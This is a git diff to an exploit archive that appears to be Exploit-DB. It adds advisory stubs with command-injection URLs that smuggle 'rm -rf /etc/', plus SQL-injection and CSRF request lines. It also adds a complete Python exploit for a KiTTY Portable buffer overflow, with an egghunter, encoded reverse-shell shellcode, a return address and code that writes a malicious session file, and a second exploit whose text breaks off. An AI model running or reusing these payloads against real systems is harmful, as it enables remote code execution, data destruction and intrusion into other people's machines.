diff --git a/files.csv b/files.csv
index 253b6fcc7..2f33cc2fc 100755
--- a/files.csv
+++ b/files.csv
@@ -35372,9 +35372,10 @@ id,file,description,date,author,platform,type,port
 39116,platforms/php/webapps/39116.txt,"GNUboard 4.3x 'ajax.autosave.php' Multiple SQL Injection Vulnerabilities",2014-03-19,"Claepo Wang",php,webapps,0
 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x Multiple Cross Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0
 39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
-39119,platforms/windows/remote/39119..py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
-39120,platforms/windows/local/39120..py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
-39122,platforms/windows/local/39122..py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
+39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0
 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0
 39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0
@@ -35400,3 +35401,8 @@ id,file,description,date,author,platform,type,port
 39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
+39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
+39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
+39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
+39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
+39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
diff --git a/platforms/cgi/webapps/39156.txt b/platforms/cgi/webapps/39156.txt
new file mode 100755
index 000000000..dc7b72cbe
--- /dev/null
+++ b/platforms/cgi/webapps/39156.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/67215/info
+
+ZamFoo is prone to multiple remote command-execution vulnerabilities.
+
+Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
+
+ZamFoo 12.6 is vulnerable; other versions may also be affected.
+
+https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
+
+https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
+
+
diff --git a/platforms/hardware/remote/39154.txt b/platforms/hardware/remote/39154.txt
new file mode 100755
index 000000000..ba96bf036
--- /dev/null
+++ b/platforms/hardware/remote/39154.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67033/info
+
+Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
+
+An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
+
+Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected.
+
+http://www.example.com/password.cgi?sysPassword=[Your Password]
\ No newline at end of file
diff --git a/platforms/linux/remote/39155.txt b/platforms/linux/remote/39155.txt
new file mode 100755
index 000000000..ff5b43d7b
--- /dev/null
+++ b/platforms/linux/remote/39155.txt
@@ -0,0 +1,47 @@
+source: http://www.securityfocus.com/bid/67159/info
+
+lxml is prone to a security-bypass vulnerability.
+
+An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.
+
+Versions prior to lxml 3.3.5 are vulnerable.
+
+from lxml.html.clean import clean_html
+
+html = '''\
+
+
+
+aaa
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+bbb
+
+'''
+
+print clean_html(html)
+
+
+Output:
+
+
diff --git a/platforms/php/webapps/39153.txt b/platforms/php/webapps/39153.txt
new file mode 100755
index 000000000..2c59f44b1
--- /dev/null
+++ b/platforms/php/webapps/39153.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/67031/info
+
+iDevAffiliate is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+iDevAffiliate 5.0 and prior are vulnerable.
+
+http://www.example.com/idevaffiliate/idevads.php?id=6&ad=[SQLi]
\ No newline at end of file
diff --git a/platforms/php/webapps/39157.txt b/platforms/php/webapps/39157.txt
new file mode 100755
index 000000000..b5ea3a46c
--- /dev/null
+++ b/platforms/php/webapps/39157.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67241/info
+
+Puntopy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/novedad.php?id=[SQL Injection]
\ No newline at end of file
diff --git a/platforms/windows/local/39120.py b/platforms/windows/local/39120.py
new file mode 100755
index 000000000..8a3e9a2b0
--- /dev/null
+++ b/platforms/windows/local/39120.py
@@ -0,0 +1,412 @@
+# Exploit Title: KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP, DoS 7/8.1/10)
+# Date: 28/12/2015
+# Exploit Author: Guillaume Kaddouch
+# Twitter: @gkweb76
+# Blog: http://networkfilter.blogspot.com
+# GitHub: https://github.com/gkweb76/exploits
+# Vendor Homepage: http://www.9bis.net/kitty/
+# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
+# Version: 0.65.0.2p
+# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 8.1 Pro x64 (FR), Windows 10 Pro x64 (FR)
+# Category: Local
+
+
+"""
+Disclosure Timeline:
+--------------------
+2015-09-13: Vulnerability discovered
+2015-09-26: Vendor contacted
+2015-09-28: Vendor answer
+2015-10-09: KiTTY 0.65.0.3p released, still vulnerable
+2015-10-20: KiTTY 0.65.1.1p released, still vulnerable
+2015-11-15: KiTTY 0.66.6.1p released, seems fixed
+2015-12-28: exploit published
+
+Description :
+-------------
+A local overflow exists in the session file used by KiTTY portable, in the HostName parameter. It is possible to write
+an overly long string to trigger an overflow. It can be used to trigger code execution on Windows XP SP3, or to crash
+the program from Windows 7 to Windows 10. It has been tested with KiTTY portable 0.65.0.2p/0.65.0.3p/0.65.1.1p, but earlier versions are
+likely to be vulnerable too.
+
+WinXP -> Local Code Execution
+Win7 -> Denial Of Service
+Win8.1 -> Denial Of Service
+Win10 -> Denial Of Service
+
+Instructions:
+-------------
+- Run exploit
+- Launch KiTTY, select "EvilSession" on the session list, then click "Load".
+
+Exploitation:
+-------------
+When writing a 1500 bytes string to the HostName parameter in a session file, EIP is overwritten at offset 1232.
+As ESP points to our buffer, we use an address doing a JMP ESP in an unprotected DLL. However, as the memory area
+we land in is not reliable for bigger shellcode such as reverse shell, using an egg hunter is required. The final
+shellcode is written into another session parameter, LogFileName. After successful exploitation, a reverse shell
+is given if this payload has been selected on Windows XP SP3 (on Windows 7/8.1/10, KiTTY crashes):
+
+guillaume@kali64:~/tools$ nc -nlvp 4444
+listening on [any] 4444 ...
+connect to [192.168.135.131] from (UNKNOWN) [192.168.135.130] 1955
+Microsoft Windows XP [version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\kitty\App\KiTTY>
+
+"""
+
+egg = "w00t" # \x77\x30\x30\x74
+
+# Windows NtAccessCheckAndAuditAlarm EggHunter
+# Size: 32 bytes
+egghunter = (
+"\x66\x81\xca\xff\x0f" # or dx,0x0fff
+"\x42" # inc edx
+"\x52" # push edx
+"\x6a\x02" # push byte +0x02
+"\x58" # pop eax
+"\xcd\x2e" # int 0x2e
+"\x3c\x05" # cmp al,0x5
+"\x5a" # pop edx
+"\x74\xef" # jz 0x0
+"\xb8\x77\x30\x30\x74" # mov eax,0x74303077 ; egg
+"\x8b\xfa" # mov edi,edx
+"\xaf" # scasd
+"\x75\xea" # jnz 0x5
+"\xaf" # scasd
+"\x75\xe7" # jnz 0x5
+"\xff\xe7" # jmp edi
+)
+
+# Metasploit Reverse Shell 192.168.135.131:4444 (replace it with any shellcode you want)
+# Encoder: x86/shikata_ga_nai
+# Bad chars: '\x00\x0a\x0d\x5c'
+# Size: 351 bytes
+shellcode = (
+"\xb8\xa9\xbf\xda\xcb\xdd\xc0\xd9\x74\x24\xf4\x5e\x29\xc9\xb1"
+"\x52\x83\xee\xfc\x31\x46\x0e\x03\xef\xb1\x38\x3e\x13\x25\x3e"
+"\xc1\xeb\xb6\x5f\x4b\x0e\x87\x5f\x2f\x5b\xb8\x6f\x3b\x09\x35"
+"\x1b\x69\xb9\xce\x69\xa6\xce\x67\xc7\x90\xe1\x78\x74\xe0\x60"
+"\xfb\x87\x35\x42\xc2\x47\x48\x83\x03\xb5\xa1\xd1\xdc\xb1\x14"
+"\xc5\x69\x8f\xa4\x6e\x21\x01\xad\x93\xf2\x20\x9c\x02\x88\x7a"
+"\x3e\xa5\x5d\xf7\x77\xbd\x82\x32\xc1\x36\x70\xc8\xd0\x9e\x48"
+"\x31\x7e\xdf\x64\xc0\x7e\x18\x42\x3b\xf5\x50\xb0\xc6\x0e\xa7"
+"\xca\x1c\x9a\x33\x6c\xd6\x3c\x9f\x8c\x3b\xda\x54\x82\xf0\xa8"
+"\x32\x87\x07\x7c\x49\xb3\x8c\x83\x9d\x35\xd6\xa7\x39\x1d\x8c"
+"\xc6\x18\xfb\x63\xf6\x7a\xa4\xdc\x52\xf1\x49\x08\xef\x58\x06"
+"\xfd\xc2\x62\xd6\x69\x54\x11\xe4\x36\xce\xbd\x44\xbe\xc8\x3a"
+"\xaa\x95\xad\xd4\x55\x16\xce\xfd\x91\x42\x9e\x95\x30\xeb\x75"
+"\x65\xbc\x3e\xd9\x35\x12\x91\x9a\xe5\xd2\x41\x73\xef\xdc\xbe"
+"\x63\x10\x37\xd7\x0e\xeb\xd0\x18\x66\x74\xa3\xf1\x75\x7a\xb5"
+"\x5d\xf3\x9c\xdf\x4d\x55\x37\x48\xf7\xfc\xc3\xe9\xf8\x2a\xae"
+"\x2a\x72\xd9\x4f\xe4\x73\x94\x43\x91\x73\xe3\x39\x34\x8b\xd9"
+"\x55\xda\x1e\x86\xa5\x95\x02\x11\xf2\xf2\xf5\x68\x96\xee\xac"
+"\xc2\x84\xf2\x29\x2c\x0c\x29\x8a\xb3\x8d\xbc\xb6\x97\x9d\x78"
+"\x36\x9c\xc9\xd4\x61\x4a\xa7\x92\xdb\x3c\x11\x4d\xb7\x96\xf5"
+"\x08\xfb\x28\x83\x14\xd6\xde\x6b\xa4\x8f\xa6\x94\x09\x58\x2f"
+"\xed\x77\xf8\xd0\x24\x3c\x08\x9b\x64\x15\x81\x42\xfd\x27\xcc"
+"\x74\x28\x6b\xe9\xf6\xd8\x14\x0e\xe6\xa9\x11\x4a\xa0\x42\x68"
+"\xc3\x45\x64\xdf\xe4\x4f"
+)
+
+junk = '\x41' * 1232
+ret = '\x7B\x46\x86\x7C' # 0x7C86467B / jmp esp / kernel32.dll
+nops = '\x90' * 8
+eggmark = egg * 2
+padding = '\x42' * (1500 - len(junk) - len(ret) - len(egghunter))
+
+payload1 = junk + ret + egghunter + padding # Egg Hunter
+payload2 = eggmark + nops + shellcode # Final Shellcode
+
+# A whole KiTTY session file, written to \Sessions\EvilSession"
+buffer = "PortKnocking\\\\\r"
+buffer += "ACSinUTF\\0\\\r"
+buffer += "Comment\\\\\r"
+buffer += "CtrlTabSwitch\\0\\\r"
+buffer += "Password\\1350b\\\r"
+buffer += "ForegroundOnBell\\0\\\r"
+buffer += "SaveWindowPos\\0\\\r"
+buffer += "WindowState\\0\\\r"
+buffer += "TermYPos\\-1\\\r"
+buffer += "TermXPos\\-1\\\r"
+buffer += "LogTimeRotation\\0\\\r"
+buffer += "Folder\\Default\\\r"
+buffer += "AutocommandOut\\\\\r"
+buffer += "Autocommand\\\\\r"
+buffer += "LogTimestamp\\\\\r"
+buffer += "AntiIdle\\\\\r"
+buffer += "ScriptfileContent\\\\\r"
+buffer += "Scriptfile\\\\\r"
+buffer += "SFTPConnect\\\\\r"
+buffer += "IconeFile\\\\\r"
+buffer += "Icone\\1\\\r"
+buffer += "SaveOnExit\\0\\\r"
+buffer += "Fullscreen\\0\\\r"
+buffer += "Maximize\\0\\\r"
+buffer += "SendToTray\\0\\\r"
+buffer += "TransparencyValue\\0\\\r"
+buffer += "zDownloadDir\\C%3A%5C\\\r"
+buffer += "szOptions\\-e%20-v\\\r"
+buffer += "szCommand\\\\\r"
+buffer += "rzOptions\\-e%20-v\\\r"
+buffer += "rzCommand\\\\\r"
+buffer += "CygtermCommand\\\\\r"
+buffer += "Cygterm64\\0\\\r"
+buffer += "CygtermAutoPath\\1\\\r"
+buffer += "CygtermAltMetabit\\0\\\r"
+buffer += "HyperlinkRegularExpression\\(((https%3F%7Cftp)%3A%5C%2F%5C%2F)%7Cwww%5C.)(([0-9]+%5C.[0-9]+%5C.[0-9]+%5C.[0-9]+)%7Clocalhost%7C([a-zA-Z0-9%5C-]+%5C.)%2A[a-zA-Z0-9%5C-]+%5C.(com%7Cnet%7Corg%7Cinfo%7Cbiz%7Cgov%7Cname%7Cedu%7C[a-zA-Z][a-zA-Z]))(%3A[0-9]+)%3F((%5C%2F%7C%5C%3F)[^%20%22]%2A[^%20,;%5C.%3A%22%3E)])%3F\\\r"
+buffer += "HyperlinkRegularExpressionUseDefault\\1\\\r"
+buffer += "HyperlinkBrowser\\\\\r"
+buffer += "HyperlinkBrowserUseDefault\\1\\\r"
+buffer += "HyperlinkUseCtrlClick\\1\\\r"
+buffer += "HyperlinkUnderline\\0\\\r"
+buffer += "FailureReconnect\\0\\\r"
+buffer += "WakeupReconnect\\0\\\r"
+buffer += "SSHManualHostKeys\\\\\r"
+buffer += "ConnectionSharingDownstream\\1\\\r"
+buffer += "ConnectionSharingUpstream\\1\\\r"
+buffer += "ConnectionSharing\\0\\\r"
+buffer += "WindowClass\\\\\r"
+buffer += "SerialFlowControl\\1\\\r"
+buffer += "SerialParity\\0\\\r"
+buffer += "SerialStopHalfbits\\2\\\r"
+buffer += "SerialDataBits\\8\\\r"
+buffer += "SerialSpeed\\9600\\\r"
+buffer += "SerialLine\\COM1\\\r"
+buffer += "ShadowBoldOffset\\1\\\r"
+buffer += "ShadowBold\\0\\\r"
+buffer += "WideBoldFontHeight\\0\\\r"
+buffer += "WideBoldFontCharSet\\0\\\r"
+buffer += "WideBoldFontIsBold\\0\\\r"
+buffer += "WideBoldFont\\\\\r"
+buffer += "WideFontHeight\\0\\\r"
+buffer += "WideFontCharSet\\0\\\r"
+buffer += "WideFontIsBold\\0\\\r"
+buffer += "WideFont\\\\\r"
+buffer += "BoldFontHeight\\0\\\r"
+buffer += "BoldFontCharSet\\0\\\r"
+buffer += "BoldFontIsBold\\0\\\r"
+buffer += "BoldFont\\\\\r"
+buffer += "ScrollbarOnLeft\\0\\\r"
+buffer += "LoginShell\\1\\\r"
+buffer += "StampUtmp\\1\\\r"
+buffer += "BugChanReq\\0\\\r"
+buffer += "BugWinadj\\0\\\r"
+buffer += "BugOldGex2\\0\\\r"
+buffer += "BugMaxPkt2\\0\\\r"
+buffer += "BugRekey2\\0\\\r"
+buffer += "BugPKSessID2\\0\\\r"
+buffer += "BugRSAPad2\\0\\\r"
+buffer += "BugDeriveKey2\\0\\\r"
+buffer += "BugHMAC2\\0\\\r"
+buffer += "BugIgnore2\\0\\\r"
+buffer += "BugRSA1\\0\\\r"
+buffer += "BugPlainPW1\\0\\\r"
+buffer += "BugIgnore1\\0\\\r"
+buffer += "PortForwardings\\\\\r"
+buffer += "RemotePortAcceptAll\\0\\\r"
+buffer += "LocalPortAcceptAll\\0\\\r"
+buffer += "X11AuthFile\\\\\r"
+buffer += "X11AuthType\\1\\\r"
+buffer += "X11Display\\\\\r"
+buffer += "X11Forward\\0\\\r"
+buffer += "BlinkText\\0\\\r"
+buffer += "BCE\\1\\\r"
+buffer += "LockSize\\0\\\r"
+buffer += "EraseToScrollback\\1\\\r"
+buffer += "ScrollOnDisp\\1\\\r"
+buffer += "ScrollOnKey\\0\\\r"
+buffer += "ScrollBarFullScreen\\0\\\r"
+buffer += "ScrollBar\\1\\\r"
+buffer += "CapsLockCyr\\0\\\r"
+buffer += "Printer\\\\\r"
+buffer += "UTF8Override\\1\\\r"
+buffer += "CJKAmbigWide\\0\\\r"
+buffer += "LineCodePage\\\\\r"
+buffer += "Wordness224\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
+buffer += "Wordness192\\2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,2,2,2,2,2,2,2,2\\\r"
+buffer += "Wordness160\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
+buffer += "Wordness128\\1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1\\\r"
+buffer += "Wordness96\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1\\\r"
+buffer += "Wordness64\\1,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,2\\\r"
+buffer += "Wordness32\\0,1,2,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,2,2,2,1,1,1,1,1,1\\\r"
+buffer += "Wordness0\\0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0\\\r"
+buffer += "MouseOverride\\1\\\r"
+buffer += "RectSelect\\0\\\r"
+buffer += "MouseIsXterm\\0\\\r"
+buffer += "PasteRTF\\0\\\r"
+buffer += "RawCNP\\0\\\r"
+buffer += "Colour33\\187,187,187\\\r"
+buffer += "Colour32\\0,0,0\\\r"
+buffer += "Colour31\\187,187,187\\\r"
+buffer += "Colour30\\0,187,187\\\r"
+buffer += "Colour29\\187,0,187\\\r"
+buffer += "Colour28\\0,0,187\\\r"
+buffer += "Colour27\\187,187,0\\\r"
+buffer += "Colour26\\0,187,0\\\r"
+buffer += "Colour25\\187,0,0\\\r"
+buffer += "Colour24\\0,0,0\\\r"
+buffer += "Colour23\\0,0,0\\\r"
+buffer += "Colour22\\187,187,187\\\r"
+buffer += "Colour21\\255,255,255\\\r"
+buffer += "Colour20\\187,187,187\\\r"
+buffer += "Colour19\\85,255,255\\\r"
+buffer += "Colour18\\0,187,187\\\r"
+buffer += "Colour17\\255,85,255\\\r"
+buffer += "Colour16\\187,0,187\\\r"
+buffer += "Colour15\\85,85,255\\\r"
+buffer += "Colour14\\0,0,187\\\r"
+buffer += "Colour13\\255,255,85\\\r"
+buffer += "Colour12\\187,187,0\\\r"
+buffer += "Colour11\\85,255,85\\\r"
+buffer += "Colour10\\0,187,0\\\r"
+buffer += "Colour9\\255,85,85\\\r"
+buffer += "Colour8\\187,0,0\\\r"
+buffer += "Colour7\\85,85,85\\\r"
+buffer += "Colour6\\0,0,0\\\r"
+buffer += "Colour5\\0,255,0\\\r"
+buffer += "Colour4\\0,0,0\\\r"
+buffer += "Colour3\\85,85,85\\\r"
+buffer += "Colour2\\0,0,0\\\r"
+buffer += "Colour1\\255,255,255\\\r"
+buffer += "Colour0\\187,187,187\\\r"
+buffer += "SelectedAsColour\\0\\\r"
+buffer += "UnderlinedAsColour\\0\\\r"
+buffer += "BoldAsColourTest\\1\\\r"
+buffer += "DisableBottomButtons\\1\\\r"
+buffer += "WindowHasSysMenu\\1\\\r"
+buffer += "WindowMaximizable\\1\\\r"
+buffer += "WindowMinimizable\\1\\\r"
+buffer += "WindowClosable\\1\\\r"
+buffer += "BoldAsColour\\1\\\r"
+buffer += "Xterm256Colour\\1\\\r"
+buffer += "ANSIColour\\1\\\r"
+buffer += "TryPalette\\0\\\r"
+buffer += "UseSystemColours\\0\\\r"
+buffer += "FontVTMode\\4\\\r"
+buffer += "FontQuality\\0\\\r"
+buffer += "FontHeight\\10\\\r"
+buffer += "FontCharSet\\0\\\r"
+buffer += "FontIsBold\\0\\\r"
+buffer += "Font\\Courier%20New\\\r"
+buffer += "TermHeight\\24\\\r"
+buffer += "TermWidth\\80\\\r"
+buffer += "WinTitle\\\\\r"
+buffer += "WinNameAlways\\1\\\r"
+buffer += "DisableBidi\\0\\\r"
+buffer += "DisableArabicShaping\\0\\\r"
+buffer += "CRImpliesLF\\0\\\r"
+buffer += "LFImpliesCR\\0\\\r"
+buffer += "AutoWrapMode\\1\\\r"
+buffer += "DECOriginMode\\0\\\r"
+buffer += "ScrollbackLines\\10000\\\r"
+buffer += "BellOverloadS\\5000\\\r"
+buffer += "BellOverloadT\\2000\\\r"
+buffer += "BellOverloadN\\5\\\r"
+buffer += "BellOverload\\1\\\r"
+buffer += "BellWaveFile\\\\\r"
+buffer += "BeepInd\\0\\\r"
+buffer += "Beep\\1\\\r"
+buffer += "BlinkCur\\0\\\r"
+buffer += "CurType\\0\\\r"
+buffer += "WindowBorder\\1\\\r"
+buffer += "SunkenEdge\\0\\\r"
+buffer += "HideMousePtr\\0\\\r"
+buffer += "FullScreenOnAltEnter\\0\\\r"
+buffer += "AlwaysOnTop\\0\\\r"
+buffer += "Answerback\\KiTTY\\\r"
+buffer += "LocalEdit\\2\\\r"
+buffer += "LocalEcho\\2\\\r"
+buffer += "TelnetRet\\1\\\r"
+buffer += "TelnetKey\\0\\\r"
+buffer += "CtrlAltKeys\\1\\\r"
+buffer += "ComposeKey\\0\\\r"
+buffer += "AltOnly\\0\\\r"
+buffer += "AltSpace\\0\\\r"
+buffer += "AltF4\\1\\\r"
+buffer += "NetHackKeypad\\0\\\r"
+buffer += "ApplicationKeypad\\0\\\r"
+buffer += "ApplicationCursorKeys\\0\\\r"
+buffer += "NoRemoteCharset\\0\\\r"
+buffer += "NoDBackspace\\0\\\r"
+buffer += "RemoteQTitleAction\\1\\\r"
+buffer += "NoRemoteWinTitle\\0\\\r"
+buffer += "NoAltScreen\\0\\\r"
+buffer += "NoRemoteResize\\0\\\r"
+buffer += "NoMouseReporting\\0\\\r"
+buffer += "NoApplicationCursors\\0\\\r"
+buffer += "NoApplicationKeys\\0\\\r"
+buffer += "LinuxFunctionKeys\\0\\\r"
+buffer += "RXVTHomeEnd\\0\\\r"
+buffer += "BackspaceIsDelete\\1\\\r"
+buffer += "PassiveTelnet\\0\\\r"
+buffer += "RFCEnviron\\0\\\r"
+buffer += "RemoteCommand\\\\\r"
+buffer += "PublicKeyFile\\\\\r"
+buffer += "SSH2DES\\0\\\r"
+buffer += "SshProt\\3\\\r"
+buffer += "SshNoShell\\0\\\r"
+buffer += "GSSCustom\\\\\r"
+buffer += "GSSLibs\\gssapi32,sspi,custom\\\r"
+buffer += "AuthGSSAPI\\1\\\r"
+buffer += "AuthKI\\1\\\r"
+buffer += "AuthTIS\\0\\\r"
+buffer += "SshBanner\\1\\\r"
+buffer += "SshNoAuth\\0\\\r"
+buffer += "RekeyBytes\\1G\\\r"
+buffer += "RekeyTime\\60\\\r"
+buffer += "KEX\\dh-gex-sha1,dh-group14-sha1,dh-group1-sha1,rsa,WARN\\\r"
+buffer += "Cipher\\aes,blowfish,3des,WARN,arcfour,des\\\r"
+buffer += "ChangeUsername\\0\\\r"
+buffer += "GssapiFwd\\0\\\r"
+buffer += "AgentFwd\\0\\\r"
+buffer += "TryAgent\\1\\\r"
+buffer += "Compression\\0\\\r"
+buffer += "NoPTY\\0\\\r"
+buffer += "LocalUserName\\\\\r"
+buffer += "UserNameFromEnvironment\\0\\\r"
+buffer += "UserName\\\\\r"
+buffer += "Environment\\\\\r"
+buffer += "ProxyTelnetCommand\\connect%20%25host%20%25port%5Cn\\\r"
+buffer += "ProxyPassword\\\\\r"
+buffer += "ProxyUsername\\\\\r"
+buffer += "ProxyPort\\80\\\r"
+buffer += "ProxyHost\\proxy\\\r"
+buffer += "ProxyMethod\\0\\\r"
+buffer += "ProxyLocalhost\\0\\\r"
+buffer += "ProxyDNS\\1\\\r"
+buffer += "ProxyExcludeList\\\\\r"
+buffer += "AddressFamily\\0\\\r"
+buffer += "TerminalModes\\CS7=A,CS8=A,DISCARD=A,DSUSP=A,ECHO=A,ECHOCTL=A,ECHOE=A,ECHOK=A,ECHOKE=A,ECHONL=A,EOF=A,EOL=A,EOL2=A,ERASE=A,FLUSH=A,ICANON=A,ICRNL=A,IEXTEN=A,IGNCR=A,IGNPAR=A,IMAXBEL=A,INLCR=A,INPCK=A,INTR=A,ISIG=A,ISTRIP=A,IUCLC=A,IXANY=A,IXOFF=A,IXON=A,KILL=A,LNEXT=A,NOFLSH=A,OCRNL=A,OLCUC=A,ONLCR=A,ONLRET=A,ONOCR=A,OPOST=A,PARENB=A,PARMRK=A,PARODD=A,PENDIN=A,QUIT=A,REPRINT=A,START=A,STATUS=A,STOP=A,SUSP=A,SWTCH=A,TOSTOP=A,WERASE=A,XCASE=A\\\r"
+buffer += "TerminalSpeed\\38400,38400\\\r"
+buffer += "TerminalType\\xterm\\\r"
+buffer += "TCPKeepalives\\0\\\r"
+buffer += "TCPNoDelay\\1\\\r"
+buffer += "PingIntervalSecs\\0\\\r"
+buffer += "PingInterval\\0\\\r"
+buffer += "WarnOnClose\\1\\\r"
+buffer += "CloseOnExit\\1\\\r"
+buffer += "PortNumber\\22\\\r"
+buffer += "Protocol\\ssh\\\r"
+buffer += "SSHLogOmitData\\0\\\r"
+buffer += "SSHLogOmitPasswords\\1\\\r"
+buffer += "LogFlush\\1\\\r"
+buffer += "LogFileClash\\-1\\\r"
+buffer += "LogType\\0\\\r"
+buffer += "LogFileName\\" + payload2 + "\\\r" # Shellcode
+buffer += "HostName\\" + payload1 + "\\\r" # Egg Hunter
+buffer += "Present\\1\\\r"
+buffer += "LogHost\\\\\r"
+
+# Location of our evil session file (modify with your KiTTY directory)
+file = "C:\\kitty\\App\\KiTTY\\Sessions\\EvilSession"
+try:
+ print "\n[*] Writing to %s (%s bytes)" % (file, len(buffer))
+ f = open(file,'w')
+ f.write(buffer)
+ f.close()
+ print "[*] Done!"
+except:
+ print "[-] Error writing %s" % file
\ No newline at end of file
diff --git a/platforms/windows/local/39121.py b/platforms/windows/local/39121.py
new file mode 100755
index 000000000..cdcd026c8
--- /dev/null
+++ b/platforms/windows/local/39121.py
@@ -0,0 +1,304 @@ +# Exploit Title: KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7) +# Date: 28/12/2015 +# Exploit Author: Guillaume Kaddouch +# Twitter: @gkweb76 +# Blog: http://networkfilter.blogspot.com +# GitHub: https://github.com/gkweb76/exploits +# Vendor Homepage: http://www.9bis.net/kitty/ +# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe +# Version: 0.65.0.2p +# Tested on: Windows 7 Pro x64 (FR) +# Category: Local + +""" +Disclosure Timeline: +-------------------- +2015-09-18: Vulnerability discovered +2015-09-26: Vendor contacted +2015-09-28: Vendor answer +2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability +2015-10-20: KiTTY 0.65.1.1p released, vendor fix, but app can still be crashed using same vulnerability on 